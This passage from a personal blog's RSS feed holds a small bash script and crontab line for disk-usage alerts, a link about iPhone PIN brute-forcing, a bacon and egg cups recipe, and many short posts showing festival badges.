  5598. ]]></description>
  5599.    <content:encoded><![CDATA[<p>Quick and dirty way to get an alert before your server starts to go crazy because of a full disk.</p>
  5600.  
  5601. <p>This script checks if a disk is more than 75% full.</p>
  5602.  
  5603. <pre>#!/bin/bash
  5604.  
  5605. df -h | awk '/%/ {
  5606.        limit = 75
  5607.        percent = sprintf("%d",$5)
  5608.        if ( percent > limit ) {
  5609.                print "Warning: ",$6," (",$1,") is to ",percent,"% full:"
  5610.                print $0
  5611.        }
  5612. }'</pre>
  5613.  
  5614. <p>Save it under /root/check_disk_usage.sh and create the following crontab entry to check the disk usage every day at half past midnight.</p>
  5615.  
  5616. <pre>30  0  *   *   *     /root/check_disk_usage.sh</pre>
  5617.  
  5618. <p>Assuming your host has configured an MTA and defined a recipient for root@&lt;yourhost&gt;, you should get an e-mail whenever a disk is more than 75% full.</p>
  5619. ]]></content:encoded>
  5620.  </item>
  5621.  
  5622.  <item>
  5623.    <title>Balelec 2008</title>
  5624.    <link>https://blog.x-way.org/Badges/2011/12/17/Balelec-2008.html</link>
  5625.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324171</guid>
  5626.    <dc:creator>Andreas Jaggi</dc:creator>
  5627.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  5628.    <pubDate>Sat, 17 Dec 2011 10:10:00 +0000</pubDate>
  5629.    <category domain="https://blog.x-way.org/Badges">Badges</category>
  5630.    <description><![CDATA[<p>Now on to the badges of 2008, as every year: <a href="http://www.balelec.ch/" title="Festival Balelec EPFL">Festival Balelec 2008</a></p>
  5631. <p><img src="https://blog.x-way.org/images/badges/Balelec_2008.jpeg" alt="Festival Balelec 2008" height="271" width="184"></p>
  5632. ]]></description>
  5633.    <content:encoded><![CDATA[<p>Now on to the badges of 2008, as every year: <a href="http://www.balelec.ch/" title="Festival Balelec EPFL">Festival Balelec 2008</a></p>
  5634. <p><img src="https://blog.x-way.org/images/badges/Balelec_2008.jpeg" alt="Festival Balelec 2008" height="271" width="184"></p>
  5635. ]]></content:encoded>
  5636.  </item>
  5637.  
  5638.  <item>
  5639.    <title>iPhone PIN bruteforce</title>
  5640.    <link>https://blog.x-way.org/Misc/2011/12/16/iPhone-PIN-bruteforce.html</link>
  5641.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324170</guid>
  5642.    <dc:creator>Andreas Jaggi</dc:creator>
  5643.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  5644.    <pubDate>Fri, 16 Dec 2011 08:20:00 +0000</pubDate>
  5645.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  5646.    <description><![CDATA[<p><a href="https://youtu.be/Tmgoussvo8A" title="c't: iPhone-Sperre nahezu nutzlos - YouTube">c't: iPhone-Sperre nahezu nutzlos</a></p>
  5647. <p>(via <a href="http://vowe.net/archives/012910.html" title="vowe dot net :: Eine vierstellige PIN ist zu schwach">vowe.net</a>)</p>
  5648. ]]></description>
  5649.    <content:encoded><![CDATA[<p><a href="https://youtu.be/Tmgoussvo8A" title="c't: iPhone-Sperre nahezu nutzlos - YouTube">c't: iPhone-Sperre nahezu nutzlos</a></p>
  5650. <p>(via <a href="http://vowe.net/archives/012910.html" title="vowe dot net :: Eine vierstellige PIN ist zu schwach">vowe.net</a>)</p>
  5651. ]]></content:encoded>
  5652.  </item>
  5653.  
  5654.  <item>
  5655.    <title>Caprices 2009</title>
  5656.    <link>https://blog.x-way.org/Badges/2011/12/16/Caprices-2009.html</link>
  5657.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324169</guid>
  5658.    <dc:creator>Andreas Jaggi</dc:creator>
  5659.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  5660.    <pubDate>Fri, 16 Dec 2011 08:15:00 +0000</pubDate>
  5661.    <category domain="https://blog.x-way.org/Badges">Badges</category>
  5662.    <description><![CDATA[<p>The only time (for now) when I got to fly in a helicopter for a music festival was at: <a href="http://www.caprices.ch/" title="Caprices Festival">Caprices 2009</a></p>
  5663. <p><img src="https://blog.x-way.org/images/badges/Caprices_2009.jpeg" alt="Caprices 2009" height="156" width="244"></p>
  5664. ]]></description>
  5665.    <content:encoded><![CDATA[<p>The only time (for now) when I got to fly in a helicopter for a music festival was at: <a href="http://www.caprices.ch/" title="Caprices Festival">Caprices 2009</a></p>
  5666. <p><img src="https://blog.x-way.org/images/badges/Caprices_2009.jpeg" alt="Caprices 2009" height="156" width="244"></p>
  5667. ]]></content:encoded>
  5668.  </item>
  5669.  
  5670.  <item>
  5671.    <title>Balelec 2009</title>
  5672.    <link>https://blog.x-way.org/Badges/2011/12/15/Balelec-2009.html</link>
  5673.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324168</guid>
  5674.    <dc:creator>Andreas Jaggi</dc:creator>
  5675.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  5676.    <pubDate>Thu, 15 Dec 2011 08:37:00 +0000</pubDate>
  5677.    <category domain="https://blog.x-way.org/Badges">Badges</category>
  5678.    <description><![CDATA[<p>And once more there is a badge from: <a href="http://www.balelec.ch/" title="Festival Balelec EPFL">Festival Balelec 2009</a></p>
  5679. <p><img src="https://blog.x-way.org/images/badges/Balelec_2009.jpeg" alt="Festival Balelec 2009" height="271" width="184"></p>
  5680. ]]></description>
  5681.    <content:encoded><![CDATA[<p>And once more there is a badge from: <a href="http://www.balelec.ch/" title="Festival Balelec EPFL">Festival Balelec 2009</a></p>
  5682. <p><img src="https://blog.x-way.org/images/badges/Balelec_2009.jpeg" alt="Festival Balelec 2009" height="271" width="184"></p>
  5683. ]]></content:encoded>
  5684.  </item>
  5685.  
  5686.  <item>
  5687.    <title>Festival de la terre 2009</title>
  5688.    <link>https://blog.x-way.org/Badges/2011/12/14/Festival-de-la-terre-2009.html</link>
  5689.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324167</guid>
  5690.    <dc:creator>Andreas Jaggi</dc:creator>
  5691.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  5692.    <pubDate>Wed, 14 Dec 2011 12:44:00 +0000</pubDate>
  5693.    <category domain="https://blog.x-way.org/Badges">Badges</category>
  5694.    <description><![CDATA[<p>Here comes the largest badge in my collection: <a href="https://web.archive.org/web/20130515093104/http://www.festivaldelaterre.ch/" title="Festival de la terre (archive.org)">Festival de la terre 2009</a></p>
  5695. <p><img src="https://blog.x-way.org/images/badges/Festival_de_la_terre_2009.jpeg" alt="Festival de la terre 2009" height="418" width="300"></p>
  5696. ]]></description>
  5697.    <content:encoded><![CDATA[<p>Here comes the largest badge in my collection: <a href="https://web.archive.org/web/20130515093104/http://www.festivaldelaterre.ch/" title="Festival de la terre (archive.org)">Festival de la terre 2009</a></p>
  5698. <p><img src="https://blog.x-way.org/images/badges/Festival_de_la_terre_2009.jpeg" alt="Festival de la terre 2009" height="418" width="300"></p>
  5699. ]]></content:encoded>
  5700.  </item>
  5701.  
  5702.  <item>
  5703.    <title>Montreux Jazz 2009</title>
  5704.    <link>https://blog.x-way.org/Badges/2011/12/13/Montreux-Jazz-2009.html</link>
  5705.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324166</guid>
  5706.    <dc:creator>Andreas Jaggi</dc:creator>
  5707.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  5708.    <pubDate>Tue, 13 Dec 2011 07:44:00 +0000</pubDate>
  5709.    <category domain="https://blog.x-way.org/Badges">Badges</category>
  5710.    <description><![CDATA[<p>Probably the most 'famous' badge in my collection: <a href="https://www.montreuxjazzfestival.com/" title="Montreux Jazz Festival">Montreux Jazz Festival 2009</a></p>
  5711. <p><img src="https://blog.x-way.org/images/badges/Montreux_Jazz_Festival_2009.jpeg" alt="Montreux Jazz 2009" height="407" width="274"></p>
  5712. ]]></description>
  5713.    <content:encoded><![CDATA[<p>Probably the most 'famous' badge in my collection: <a href="https://www.montreuxjazzfestival.com/" title="Montreux Jazz Festival">Montreux Jazz Festival 2009</a></p>
  5714. <p><img src="https://blog.x-way.org/images/badges/Montreux_Jazz_Festival_2009.jpeg" alt="Montreux Jazz 2009" height="407" width="274"></p>
  5715. ]]></content:encoded>
  5716.  </item>
  5717.  
  5718.  <item>
  5719.    <title>Metropop 2009</title>
  5720.    <link>https://blog.x-way.org/Badges/2011/12/12/Metropop-2009.html</link>
  5721.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324165</guid>
  5722.    <dc:creator>Andreas Jaggi</dc:creator>
  5723.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  5724.    <pubDate>Mon, 12 Dec 2011 05:44:00 +0000</pubDate>
  5725.    <category domain="https://blog.x-way.org/Badges">Badges</category>
  5726.    <description><![CDATA[<p>With the 2009 badges, I can almost fill another week. Let's start with: <a href="http://www.metropop.ch/" title="Metropop Festival Lausanne">Metropop Festival 2009</a></p>
  5727. <p><img src="https://blog.x-way.org/images/badges/Metropop_2009.jpeg" alt="Metropop 2009" height="238" width="171"></p>
  5728. ]]></description>
  5729.    <content:encoded><![CDATA[<p>With the 2009 badges, I can almost fill another week. Let's start with: <a href="http://www.metropop.ch/" title="Metropop Festival Lausanne">Metropop Festival 2009</a></p>
  5730. <p><img src="https://blog.x-way.org/images/badges/Metropop_2009.jpeg" alt="Metropop 2009" height="238" width="171"></p>
  5731. ]]></content:encoded>
  5732.  </item>
  5733.  
  5734.  <item>
  5735.    <title>(Mini) Bacon and Egg Cups</title>
  5736.    <link>https://blog.x-way.org/Food/2011/12/11/Mini-Bacon-and-Egg-Cups.html</link>
  5737.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324164</guid>
  5738.    <dc:creator>Andreas Jaggi</dc:creator>
  5739.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  5740.    <pubDate>Sun, 11 Dec 2011 18:55:00 +0000</pubDate>
  5741.    <category domain="https://blog.x-way.org/Food">Food</category>
  5742.    <description><![CDATA[<p>Last week I stumbled upon this delicious looking <a href="http://www.howto-simplify.com/2010/08/bacon-and-egg-cups.html" title="How To: Simplify: Bacon and Egg Cups">bacon and egg cups recipe</a> and thought that I should try it sometimes, which I did this morning.<br>
  5743. Since I don't have a real muffin tin I used a somewhat smaller cake tin, with the result that the handling was a bit more delicate and also my cups are more like 'mini' cups (which is not necessarily a bad thing because the bacon I bought was also smaller than expected and thus it matched perfectly).</p>
  5744.  
  5745. <p><img src="https://blog.x-way.org/images/bread_with_holes.jpeg" alt="Bread with holes" width="439" height="386"><br>This is the result of the first step in the recipe and all what is leftover once I was finished. Not very useful for putting jam on it anymore, but perfect to stir the next cheese fondue :-)</p>
  5746.  
  5747. <p>
  5748. Ingredients:
  5749. </p>
  5750. <ul>
  5751. <li>1 slice of bread per muffin cup (1 slice per 4 cups for the 'mini' version)</li>
  5752. <li>2 slices of bacon per muffing cup (use small slices for the 'mini' version)</li>
  5753. <li>1 egg per muffin cup (same for the 'mini' version)</li>
  5754. <li>1 tablespoon shredded cheddar cheese per muffin cup (optional, I used some parmesan instead)</li>
  5755. <li>salt and pepper to taste</li>
  5756. </ul>
  5757.  
  5758. <p>
  5759. Directions:
  5760. </p>
  5761. <ol>
  5762. <li>Preheat oven to 375 degrees.<br>(that's 190 degrees celsius)</li>
  5763. <li>Use a cookie cutter to cut circles out of each piece of bread.</li>
  5764. <li>Grease a muffin tin and press circles of bread in the muffin cups. Place in the oven and bake for 5 minutes or until bread is slightly toasted. Remove from oven.<br>(be careful when doing the 'mini' version, your bread will be toasted in well under 5 minutes)</li>
  5765. <li>Cook bacon in a skillet until halfway cooked (approximately 3-4 minutes).<br>(here again: when using small bacon slices they will be ready in less than a minute, be careful to not make them too crispy otherwise they will be hard to fit into the cups)</li>
  5766. <li>Place 2 slices of bacon on top of the pieces of bread to form a cup (the bacon should cover the bread and the sides of each cup).</li>
  5767. <li>Crack an egg into each muffin cup (on top of the bacon). It helps to discard a little bit of the egg white after cracking and before pouring into the muffin cup.<br>(for the 'mini' version keep the surplus egg white in a bowl and use it to make some 'only-white' cups, one egg gives enough surplus egg white for another cup)</li>
  5768. <li>Place in the oven and bake for 18-20 minutes or until the eggs are set.<br>(for the 'mini' version use 8-10 minutes, I almost burned mine!)</li>
  5769. <li>Sprinkle cheddar cheese over each egg and continue to bake until cheese is melted (this step is optional).</li>
  5770. <li>Season with salt and pepper to taste and serve.</li>
  5771. </ol>
  5772. <p>
  5773. Enjoy!
  5774. </p>
  5775. <p>
  5776. <img src="https://blog.x-way.org/images/bacon_and_egg_cups.jpeg" alt="bacon and egg cups" width="429" height="518">
  5777. </p>
  5778.  
  5779. <p>
  5780. <img src="https://blog.x-way.org/images/bacon_and_egg_cups_side.jpeg" alt="bacon and egg cups sideview" width="440" height="269">
  5781. </p>
  5782. <p>The advantage of my 'mini' version is that you will end up having plenty of little bacon and egg cups, yummy :-)</p>
  5783. <p>
  5784. <img src="https://blog.x-way.org/images/plenty_bacon_and_egg_cups.jpeg" alt="plate full of bacon and egg cups" width="440" height="429">
  5785. </p>
  5786. ]]></description>
  5787.    <content:encoded><![CDATA[<p>Last week I stumbled upon this delicious looking <a href="http://www.howto-simplify.com/2010/08/bacon-and-egg-cups.html" title="How To: Simplify: Bacon and Egg Cups">bacon and egg cups recipe</a> and thought that I should try it sometimes, which I did this morning.<br>
  5788. Since I don't have a real muffin tin I used a somewhat smaller cake tin, with the result that the handling was a bit more delicate and also my cups are more like 'mini' cups (which is not necessarily a bad thing because the bacon I bought was also smaller than expected and thus it matched perfectly).</p>
  5789.  
  5790. <p><img src="https://blog.x-way.org/images/bread_with_holes.jpeg" alt="Bread with holes" width="439" height="386"><br>This is the result of the first step in the recipe and all what is leftover once I was finished. Not very useful for putting jam on it anymore, but perfect to stir the next cheese fondue :-)</p>
  5791.  
  5792. <p>
  5793. Ingredients:
  5794. </p>
  5795. <ul>
  5796. <li>1 slice of bread per muffin cup (1 slice per 4 cups for the 'mini' version)</li>
  5797. <li>2 slices of bacon per muffing cup (use small slices for the 'mini' version)</li>
  5798. <li>1 egg per muffin cup (same for the 'mini' version)</li>
  5799. <li>1 tablespoon shredded cheddar cheese per muffin cup (optional, I used some parmesan instead)</li>
  5800. <li>salt and pepper to taste</li>
  5801. </ul>
  5802.  
  5803. <p>
  5804. Directions:
  5805. </p>
  5806. <ol>
  5807. <li>Preheat oven to 375 degrees.<br>(that's 190 degrees celsius)</li>
  5808. <li>Use a cookie cutter to cut circles out of each piece of bread.</li>
  5809. <li>Grease a muffin tin and press circles of bread in the muffin cups. Place in the oven and bake for 5 minutes or until bread is slightly toasted. Remove from oven.<br>(be careful when doing the 'mini' version, your bread will be toasted in well under 5 minutes)</li>
  5810. <li>Cook bacon in a skillet until halfway cooked (approximately 3-4 minutes).<br>(here again: when using small bacon slices they will be ready in less than a minute, be careful to not make them too crispy otherwise they will be hard to fit into the cups)</li>
  5811. <li>Place 2 slices of bacon on top of the pieces of bread to form a cup (the bacon should cover the bread and the sides of each cup).</li>
  5812. <li>Crack an egg into each muffin cup (on top of the bacon). It helps to discard a little bit of the egg white after cracking and before pouring into the muffin cup.<br>(for the 'mini' version keep the surplus egg white in a bowl and use it to make some 'only-white' cups, one egg gives enough surplus egg white for another cup)</li>
  5813. <li>Place in the oven and bake for 18-20 minutes or until the eggs are set.<br>(for the 'mini' version use 8-10 minutes, I almost burned mine!)</li>
  5814. <li>Sprinkle cheddar cheese over each egg and continue to bake until cheese is melted (this step is optional).</li>
  5815. <li>Season with salt and pepper to taste and serve.</li>
  5816. </ol>
  5817. <p>
  5818. Enjoy!
  5819. </p>
  5820. <p>
  5821. <img src="https://blog.x-way.org/images/bacon_and_egg_cups.jpeg" alt="bacon and egg cups" width="429" height="518">
  5822. </p>
  5823.  
  5824. <p>
  5825. <img src="https://blog.x-way.org/images/bacon_and_egg_cups_side.jpeg" alt="bacon and egg cups sideview" width="440" height="269">
  5826. </p>
  5827. <p>The advantage of my 'mini' version is that you will end up having plenty of little bacon and egg cups, yummy :-)</p>
  5828. <p>
  5829. <img src="https://blog.x-way.org/images/plenty_bacon_and_egg_cups.jpeg" alt="plate full of bacon and egg cups" width="440" height="429">
  5830. </p>
  5831. ]]></content:encoded>
  5832.  </item>
  5833.  
  5834.  <item>
  5835.    <title>Caprices 2010</title>
  5836.    <link>https://blog.x-way.org/Badges/2011/12/11/Caprices-2010.html</link>
  5837.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324163</guid>
  5838.    <dc:creator>Andreas Jaggi</dc:creator>
  5839.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  5840.    <pubDate>Sun, 11 Dec 2011 11:35:00 +0000</pubDate>
  5841.    <category domain="https://blog.x-way.org/Badges">Badges</category>
  5842.    <description><![CDATA[<p>Right at the beginning of spring, in the beautiful mountains of <a href="http://www.crans-montana.ch/" title="Crans-Montana">Crans-Montana</a>, there is: <a href="http://www.caprices.ch/" title="Caprices Festival">Caprices 2010</a></p>
  5843. <p><img src="https://blog.x-way.org/images/badges/Caprices_2010.jpeg" alt="Caprices 2010" height="155" width="242"></p>
  5844. ]]></description>
  5845.    <content:encoded><![CDATA[<p>Right at the beginning of spring, in the beautiful mountains of <a href="http://www.crans-montana.ch/" title="Crans-Montana">Crans-Montana</a>, there is: <a href="http://www.caprices.ch/" title="Caprices Festival">Caprices 2010</a></p>
  5846. <p><img src="https://blog.x-way.org/images/badges/Caprices_2010.jpeg" alt="Caprices 2010" height="155" width="242"></p>
  5847. ]]></content:encoded>
  5848.  </item>
  5849.  
  5850.  <item>
  5851.    <title>Artiphys 2010</title>
  5852.    <link>https://blog.x-way.org/Badges/2011/12/10/Artiphys-2010.html</link>
  5853.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324162</guid>
  5854.    <dc:creator>Andreas Jaggi</dc:creator>
  5855.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  5856.    <pubDate>Sat, 10 Dec 2011 09:36:00 +0000</pubDate>
  5857.    <category domain="https://blog.x-way.org/Badges">Badges</category>
  5858.    <description><![CDATA[<p>Also this one took place in 2010: <a href="http://www.artiphys.ch/" title="Festival Artiphys">Artiphys 2010</a></p>
  5859. <p><img src="https://blog.x-way.org/images/badges/Artiphys_2010.jpeg" alt="Artiphys 2010" height="279" width="354"></p>
  5860. ]]></description>
  5861.    <content:encoded><![CDATA[<p>Also this one took place in 2010: <a href="http://www.artiphys.ch/" title="Festival Artiphys">Artiphys 2010</a></p>
  5862. <p><img src="https://blog.x-way.org/images/badges/Artiphys_2010.jpeg" alt="Artiphys 2010" height="279" width="354"></p>
  5863. ]]></content:encoded>
  5864.  </item>
  5865.  
  5866.  <item>
  5867.    <title>Balelec 2010</title>
  5868.    <link>https://blog.x-way.org/Badges/2011/12/09/Balelec-2010.html</link>
  5869.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324161</guid>
  5870.    <dc:creator>Andreas Jaggi</dc:creator>
  5871.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  5872.    <pubDate>Fri, 09 Dec 2011 00:37:00 +0000</pubDate>
  5873.    <category domain="https://blog.x-way.org/Badges">Badges</category>
  5874.    <description><![CDATA[<p>Like almost every year, there is a badge from: <a href="http://www.balelec.ch/" title="Festival Balelec EPFL">Festival Balelec 2010</a></p>
  5875. <p><img src="https://blog.x-way.org/images/badges/Balelec_2010.jpeg" alt="Festival Balelec 2010" height="270" width="189"></p>
  5876. ]]></description>
  5877.    <content:encoded><![CDATA[<p>Like almost every year, there is a badge from: <a href="http://www.balelec.ch/" title="Festival Balelec EPFL">Festival Balelec 2010</a></p>
  5878. <p><img src="https://blog.x-way.org/images/badges/Balelec_2010.jpeg" alt="Festival Balelec 2010" height="270" width="189"></p>
  5879. ]]></content:encoded>
  5880.  </item>
  5881.  
  5882.  <item>
  5883.    <title>Metropop 2010</title>
  5884.    <link>https://blog.x-way.org/Badges/2011/12/08/Metropop-2010.html</link>
  5885.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324160</guid>
  5886.    <dc:creator>Andreas Jaggi</dc:creator>
  5887.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  5888.    <pubDate>Thu, 08 Dec 2011 07:44:00 +0000</pubDate>
  5889.    <category domain="https://blog.x-way.org/Badges">Badges</category>
  5890.    <description><![CDATA[<p>Looks like most of the 2011 badges are done. Now on to the 2010 ones, starting with: <a href="http://www.metropop.ch/" title="Metropop Festival Lausanne">Metropop Festival 2010</a></p>
  5891. <p><img src="https://blog.x-way.org/images/badges/Metropop_2010.jpeg" alt="Metropop 2010" height="246" width="151"></p>
  5892. ]]></description>
  5893.    <content:encoded><![CDATA[<p>Looks like most of the 2011 badges are done. Now on to the 2010 ones, starting with: <a href="http://www.metropop.ch/" title="Metropop Festival Lausanne">Metropop Festival 2010</a></p>
  5894. <p><img src="https://blog.x-way.org/images/badges/Metropop_2010.jpeg" alt="Metropop 2010" height="246" width="151"></p>
  5895. ]]></content:encoded>
  5896.  </item>
  5897.  
  5898.  <item>
  5899.    <title>Caprices 2011</title>
  5900.    <link>https://blog.x-way.org/Badges/2011/12/07/Caprices-2011.html</link>
  5901.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324159</guid>
  5902.    <dc:creator>Andreas Jaggi</dc:creator>
  5903.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  5904.    <pubDate>Wed, 07 Dec 2011 14:15:00 +0000</pubDate>
  5905.    <category domain="https://blog.x-way.org/Badges">Badges</category>
  5906.    <description><![CDATA[<p>And there comes the next music festival: <a href="http://www.caprices.ch/" title="Caprices Festival">Caprices 2011</a></p>
  5907. <p><img src="https://blog.x-way.org/images/badges/Caprices_2011.jpeg" alt="Caprices 2011" height="150" width="240"></p>
  5908. ]]></description>
  5909.    <content:encoded><![CDATA[<p>And there comes the next music festival: <a href="http://www.caprices.ch/" title="Caprices Festival">Caprices 2011</a></p>
  5910. <p><img src="https://blog.x-way.org/images/badges/Caprices_2011.jpeg" alt="Caprices 2011" height="150" width="240"></p>
  5911. ]]></content:encoded>
  5912.  </item>
  5913.  
  5914.  <item>
  5915.    <title>Artiphys 2011</title>
  5916.    <link>https://blog.x-way.org/Badges/2011/12/06/Artiphys-2011.html</link>
  5917.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324158</guid>
  5918.    <dc:creator>Andreas Jaggi</dc:creator>
  5919.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  5920.    <pubDate>Tue, 06 Dec 2011 07:45:00 +0000</pubDate>
  5921.    <category domain="https://blog.x-way.org/Badges">Badges</category>
  5922.    <description><![CDATA[<p>Another student music festival from <a href="http://www.epfl.ch/" title="EPFL">EPFL</a>: <a href="http://www.artiphys.ch/" title="Festival Artiphys">Artiphys 2011</a></p>
  5923. <p><img src="https://blog.x-way.org/images/badges/Artiphys_2011.jpeg" alt="Artiphys 2011" height="314" width="213"></p>
  5924. ]]></description>
  5925.    <content:encoded><![CDATA[<p>Another student music festival from <a href="http://www.epfl.ch/" title="EPFL">EPFL</a>: <a href="http://www.artiphys.ch/" title="Festival Artiphys">Artiphys 2011</a></p>
  5926. <p><img src="https://blog.x-way.org/images/badges/Artiphys_2011.jpeg" alt="Artiphys 2011" height="314" width="213"></p>
  5927. ]]></content:encoded>
  5928.  </item>
  5929.  
  5930.  <item>
  5931.    <title>Sat Rocks IV</title>
  5932.    <link>https://blog.x-way.org/Badges/2011/12/05/Sat-Rocks-IV.html</link>
  5933.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324157</guid>
  5934.    <dc:creator>Andreas Jaggi</dc:creator>
  5935.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  5936.    <pubDate>Mon, 05 Dec 2011 05:20:00 +0000</pubDate>
  5937.    <category domain="https://blog.x-way.org/Badges">Badges</category>
  5938.    <description><![CDATA[<p>Again a badge from a music festival: <a href="http://satrocks.epfl.ch/" title="Sat Rocks, le festival de Satellite">Sat Rocks IV</a></p>
  5939. <p><img src="https://blog.x-way.org/images/badges/Satrocks_2011.jpeg" alt="Sat Rocks IV, c'est chouette" height="287" width="199"></p>
  5940. ]]></description>
  5941.    <content:encoded><![CDATA[<p>Again a badge from a music festival: <a href="http://satrocks.epfl.ch/" title="Sat Rocks, le festival de Satellite">Sat Rocks IV</a></p>
  5942. <p><img src="https://blog.x-way.org/images/badges/Satrocks_2011.jpeg" alt="Sat Rocks IV, c'est chouette" height="287" width="199"></p>
  5943. ]]></content:encoded>
  5944.  </item>
  5945.  
  5946.  <item>
  5947.    <title>MoleKul'Air</title>
  5948.    <link>https://blog.x-way.org/Badges/2011/12/04/MoleKulAir.html</link>
  5949.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324156</guid>
  5950.    <dc:creator>Andreas Jaggi</dc:creator>
  5951.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  5952.    <pubDate>Sun, 04 Dec 2011 12:55:00 +0000</pubDate>
  5953.    <category domain="https://blog.x-way.org/Badges">Badges</category>
  5954.    <description><![CDATA[<p>The next badge is from a concert (or rather a series of three concerts): <a href="https://web.archive.org/web/20130823050631/http://www.molekulair.ch/" title="MoleKul'Air (archive.org)">MoleKul'Air</a></p>
  5955. <p><img src="https://blog.x-way.org/images/badges/MoleKulAir_2011.jpeg" alt="MoleKul'Air 2011" height="248" width="156"></p>
  5956. ]]></description>
  5957.    <content:encoded><![CDATA[<p>The next badge is from a concert (or rather a series of three concerts): <a href="https://web.archive.org/web/20130823050631/http://www.molekulair.ch/" title="MoleKul'Air (archive.org)">MoleKul'Air</a></p>
  5958. <p><img src="https://blog.x-way.org/images/badges/MoleKulAir_2011.jpeg" alt="MoleKul'Air 2011" height="248" width="156"></p>
  5959. ]]></content:encoded>
  5960.  </item>
  5961.  
  5962.  <item>
  5963.    <title>Balelec 2011</title>
  5964.    <link>https://blog.x-way.org/Badges/2011/12/03/Balelec-2011.html</link>
  5965.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324155</guid>
  5966.    <dc:creator>Andreas Jaggi</dc:creator>
  5967.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  5968.    <pubDate>Sat, 03 Dec 2011 12:55:00 +0000</pubDate>
  5969.    <category domain="https://blog.x-way.org/Badges">Badges</category>
  5970.    <description><![CDATA[<p>Another badge from a music festival: <a href="http://www.balelec.ch/" title="Festival Balelec EPFL">Festival Balelec 2011</a></p>
  5971. <p><img src="https://blog.x-way.org/images/badges/Balelec_2011.jpeg" alt="Festival Balelec 2011" height="287" width="205"></p>
  5972. ]]></description>
  5973.    <content:encoded><![CDATA[<p>Another badge from a music festival: <a href="http://www.balelec.ch/" title="Festival Balelec EPFL">Festival Balelec 2011</a></p>
  5974. <p><img src="https://blog.x-way.org/images/badges/Balelec_2011.jpeg" alt="Festival Balelec 2011" height="287" width="205"></p>
  5975. ]]></content:encoded>
  5976.  </item>
  5977.  
  5978.  <item>
  5979.    <title>Metropop 2011</title>
  5980.    <link>https://blog.x-way.org/Badges/2011/12/02/Metropop-2011.html</link>
  5981.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324154</guid>
  5982.    <dc:creator>Andreas Jaggi</dc:creator>
  5983.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  5984.    <pubDate>Fri, 02 Dec 2011 08:02:00 +0000</pubDate>
  5985.    <category domain="https://blog.x-way.org/Badges">Badges</category>
  5986.    <description><![CDATA[<p>Here comes the next badge. This time not from a tech conference but from a music festival: <a href="http://www.metropop.ch/" title="Metropop Festival Lausanne">Metropop Festival 2011</a></p>
  5987. <p><img src="https://blog.x-way.org/images/badges/Metropop_2011.jpeg" alt="Metropop Festival 2011" height="244" width="153"></p>
  5988. <p>For insiders, there is also a view of the <a href="https://blog.x-way.org/images/badges/Team_de_la_mort_2011.jpeg" title="Badge backside">backside</a> :-)</p>
  5989. ]]></description>
  5990.    <content:encoded><![CDATA[<p>Here comes the next badge. This time not from a tech conference but from a music festival: <a href="http://www.metropop.ch/" title="Metropop Festival Lausanne">Metropop Festival 2011</a></p>
  5991. <p><img src="https://blog.x-way.org/images/badges/Metropop_2011.jpeg" alt="Metropop Festival 2011" height="244" width="153"></p>
  5992. <p>For insiders, there is also a view of the <a href="https://blog.x-way.org/images/badges/Team_de_la_mort_2011.jpeg" title="Badge backside">backside</a> :-)</p>
  5993. ]]></content:encoded>
  5994.  </item>
  5995.  
  5996.  <item>
  5997.    <title>Badges</title>
  5998.    <link>https://blog.x-way.org/Badges/2011/12/01/Badges.html</link>
  5999.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324153</guid>
  6000.    <dc:creator>Andreas Jaggi</dc:creator>
  6001.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  6002.    <pubDate>Thu, 01 Dec 2011 00:00:00 +0000</pubDate>
  6003.    <category domain="https://blog.x-way.org/Badges">Badges</category>
  6004.    <description><![CDATA[<p>When attending conferences you often receive a badge granting you access (which usually is not much more than a nametag with some logo).
